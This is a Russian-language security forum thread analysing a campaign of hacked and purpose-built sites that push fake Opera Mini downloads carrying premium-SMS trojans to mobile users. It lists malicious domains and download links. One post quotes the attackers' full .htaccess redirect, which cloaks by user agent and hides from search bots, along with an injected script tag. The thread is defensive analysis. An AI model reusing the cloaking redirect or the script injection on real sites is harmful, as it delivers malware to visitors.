Фальшивые Opera Mini - Общий форум по информационной безопасности - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

priv8v
976a6b733169.jpg


Тем, кому приходиться путешествовать по просторам интернета с мобильного гаджета с помощью Opera Mini, тому наверняка знакома эта удручающая картина - хочешь зайти на сайт, а тебе пытаются впарить новую оперу...

Если скачивать, то есть всего два варианта развития событий:

1. По ссылке будет лежать зловред (для телефона, разумеется), который будет прожорлив до отправки платных смс
2. Будет лежать Опера, но в обертке опять таки трояна с тем же функционалом, что и в первом пункте (может даже с ЛС, в котором цены будут указаны)

Хочется отметить, что данные сайты являются зараженными на достаточно глубоком уровне (не ифреймом), зловредный файл лежит прямо среди других файлов сайта...

Ниже будут приведены адреса некоторых сайтов, краткое описание что и почему происходит и (чтобы не быть голословным) ссылки на ВТ на анализ файлов.

На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar
Зараженный файл на сайте:
_http://vsofte.ru//templates/WebTPL/js/jquery-1.4.2.min.js

На _flashki.ru (по запросу "игры" в гугле на втором месте сайт, кстати) редиректит на _http://opera-new6.ru/?id=678
а если на _opera-new6.ru/download/?id=678 заходить с обычным юзерагентом, то выцепляется просто имя ОСи (винды) и качается setup.CAB с 46.161.31.167
Все благодаря _http://flashki.ru//shared/js/jquery/simplemodal/jquery.simplemodal.js

А вот и под андроид:
http://mobile-premium-v10.com/jar/Opera_Mini_NEW_04548.jar слив идет, с хтаксесом помудрено видимо там...)

Еще на взломанных сайтах встречаются редиректы на:
_http://updateyouropera.ru_http://mobile-premium-v9.com_http://dl1.mobile-download.ru/midlet/d1Gnhe/m1/mt73/a10_5_3/nOpera Mini/s79203/sm1/Opera_Mini.jar




Таких хакнутых сайтов достаточно много...

  • Upvote 10

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

сейчас пришло в голову, что я ступанул с механизмом заражения сайтов, поторопился все поздним вечером за раз сделать...

склоняюсь к заражению пхп кода файлов, возможно, что путей/механизмов заражения сайта несколько...

в общем вопрос пока открытым остается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

С чего ты вообще решил, что это "зараженные" сайты ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

хм, ну ведь я же постом выше написал, что этот вопрос оставляю открытым про пути и механизмы заражения, т.к у меня тут по всем пунктам сомнения...

В любом случае заражены, вопрос в том где админ, а где хакеры постарались, и в том КАК именно заражены (что за файлы, когда, зачем(типа где и что за партнерка это и сколько их))...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar

Качает под ОС. С Андроида качает apk, как положено. Детект KMS:

screenshot_1317886734256.png

post-3736-1317887041_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

В любом случае огромное спасибо за интересное исследование. Вы уже давно должны ИМХО быть в Экспертном совете АМ.

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Umnik, спасибо, я как раз хотел попросить попроверять с разных осей, у самого сейчас руки не доходят все варианты перебрать...

подделайтесь под симбиан, вдруг еще сис выдаст)))

ps: пишу с оперы мини (не фальшивой:))

ps2: что кто может сказать более четко про масштабы и пути заражения?

просто в ближайшие дни я не буду за своим компом скорее всего...

в идеале еще надо паучка на пыхе написать который прочекаекает топ-20 по популярным запросам в поисковик..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Вот где собака-то серьезная зарылась! На моей памяти еще не было такой оккупации зловредами интернета, чтобы в немеренных количествах в топе практически всех популярных поисковых запросов ((

Каспер/др.веб детектит эти файлы?

ps: эпидемия - просто не то слово...(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Ну вот сам же посмотри http://lemoby.ru/

Это все не взломанные сайты, а специально созданные.

То что Яндекс так и не научился должным образом чистить выдачу, несмотря на все свои потуги - печально, да.

Но тем хуже ему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Это все не взломанные сайты, а специально созданные.

A.

в самой поисковой выдаче сайты были вроде terr.ru и students.ru, а уже с НИХ были редиректы на вышеприведенные сайты. То ли я как-то криво пишу, то ли меня как-то криво понимают...

Opera/9.80 (Windows Mobile; Opera Mini/5.1.21594/26.950; U; ru) Presto/2.8.119 Version/10.54

Кстати, поисковая выдача отличается при разных юзерагентах! Учитывайте это!

PS: может я и перегибаю планку с всерунетовской эпидемией что аж всем хана, но масштабы правда достаточно велики )))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Содержание хтаксесс на сайте, где вебмастер козел:

RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !tion [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://opera-new6.ru/?id=ТУТ_ID [L,R=302]

А если через яваскрипт, то так будет:

<script type='text/javascript' src='http://opera-new6.ru/js/?link=http%3A%2F%2Fopera-new6.ru%2F%3Fid%ТУТ_ID'></script>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik
Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября

ну да, давно встречаются, просто сейчас наболело и решил написать...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Нарыл около сотни зловредных доменов (не сайтов, где админы трафф сливают, а конечные - т.е те, КУДА льют, откуда качают). Что с ними делать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

Означает ли это что кроме DrWeb ранее 29 сентября никто не детектировал зловреда? Если не означает, то откуда такая уверенность в том, что DrWeb единственый?

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Причем тут покупка? Не уводите обсуждение в сторону. Речь идет о суперэксклюзиве от DrWeb. Итак, если вы настаиваете, что DrWeb единственный, то прошу более основательно аргументировать свою позицию, если других аргументов нет, то может не стоило писать в таком категоричном тоне о превосходстве DrWeb?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

кстати, сегодня лечил подобное. Оказался Android.smssender.86

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

каким способом? зашли туда с виртуалки с пятого IE?))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Firefox-ом, отключив AdBlock и NoScript (и плагины, конечно)

scr1.jpg

post-5047-1317922701_thumb.jpg

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr
в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

да не совсем... появление предупреждения у человека про старую версию Оперы воспринял верно. Заблочил СМС сервис, вынес саму псевдо - оперу, а потом искал - что еще воткнулось в последнее время. Нашел.... Потом отловленное проверил на рабочем компе Авастом - вердикт подтвердился

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 19.2.17.
    • santy
      Например: форумы Anti-Malware, официальный и неофициальный технические форумы Касперского разработаны при поддержке Powered by Invision Community Invision Community (ранее IPS Community Suite, Invision Power Board, сокращенно IPS, IP.Suite или IP.Board) — коммерческое программное обеспечение для организации веб-форумов, разрабатываемое американской компанией Invision Power Services Inc ----------- Получается 1С-Битрикс наше все.
    • PR55.RP55
      КОТ ( Комитет Охраны Тепла ) Африка
      Неизбежность войны, предвкушаю крах
      Если я говорю, значит, он прав
      Армагеддон — это больше, чем страх
      Это любовь, это слёзы и кровь
      Твоих сыновей
      Африка!

      [Бридж]
      Твои волосы — как прутья
      Твои мысли — белый мел
      Я однажды не проснулся
      Оттого что я висел

      [Предприпев]
      Африка!
      На твоих руках
      Твоё солнце в моих глазах
      Африка!

      [Припев]
      Чёрное на белом
      Кто-то был неправ
      Я внеплановый сын африканских трав
      Я танцую регги на грязном снегу
      Моя тень на твоём берегу
      Африка!
    • santy
      Я думаю, разработчики закона сами еще не знают как трактовать то, что они сделали. например это: Если владелец сайта является гражданином РФ или российским юридическим лицом является ли система российской, владельцем которой он считается, если сам сайт построен на зарубежном движке?
    • PR55.RP55
      " Запрет на использование иностранных сервисов авторизации (Google, Apple) на российских сайтах, введенный законами № 406-ФЗ и № 670-ФЗ, направлен на локализацию персональных данных и борьбу с утечками, требуя перехода на российские ID-системы, такие как ya.ru или mail.ru [1]. Старые аккаунты, созданные через иностранные сервисы, не удаляются, однако владельцы сайтов обязаны перевести пользователей на легитимные методы входа, включая российскую почту, телефон или Госуслуги, чтобы избежать ответственности за текущие авторизации [1]. " " Владельцы сайтов будут обязаны проводить авторизацию пользователей (например, при регистрации или входе в личный кабинет) с использованием только российских систем. К ним относятся: номер российского телефона; портал "Госуслуги"; единая биометрическая система; иные системы, владельцами которых являются граждане РФ или российские юридические лица." ya.ru или mail.ru - в теории ( и на практике ) граждане р.ф. Сама почта требует авторизации - через номер телефона. т.е. зарегистрированный пользователь уже прошёл авторизацию.  ---------- Оценка выше написанного в ИИ. :) Давайте разберем, почему ваши тезисы и выводы полностью корректны.
      1. Соответствие критериям закона
      Вы абсолютно правы: сервисы *Яндекс (ya.ru)* и *VK (VK ID / Mail.ru)* на
      100% подпадают под четвертый пункт статьи 10.2-1 закона «Об информации»:   * Их владельцами являются *российские юридические лица*.
        * Доля иностранного владения в них приведена в полное соответствие с
          законодательством РФ (контролирующие структуры находятся в
          российской юрисдикции). 2. Цепочка авторизации (наследование доверия)
      Ваша мысль о том, что /«почта требует авторизации через телефон, а
      значит, пользователь уже авторизован»/, юридически называется
      *делегированием авторизации*.   * Закон обязывает владельца форума использовать /российскую систему/
          для входа.
        * Яндекс ID или VK ID — это и есть авторизационные информационные системы.
        * То, что эти ИС внутри себя уже проверили пользователя (по номеру
          телефона, привязке к Госуслугам или через подтвержденный профиль), —
          это их зона ответственности. Для вашего форума главное, что сама
          «входная дверь» (Яндекс/VK) является российской. 3. Обязанности владельца сайта
      Приведенная вами цитата точно описывает текущее положение дел:   * *Закон не требует удалять профили* людей, вошедших когда-то через
          Google.
        * *Закон запрещает процесс* предоставления авторизации через
          иностранцев /сейчас/.
        * Чтобы не получить штраф (вступивший в силу по законопроекту №
          1110676-8), владелец сайта должен закрыть техническую возможность
          кликнуть на «Вход через Google/Apple» и предложить пользователю
          привязать к старому аккаунту российский аналог (почту, телефон или
          Яндекс/VK ID). ------- Но лучше всё это ещё уточнить.    
×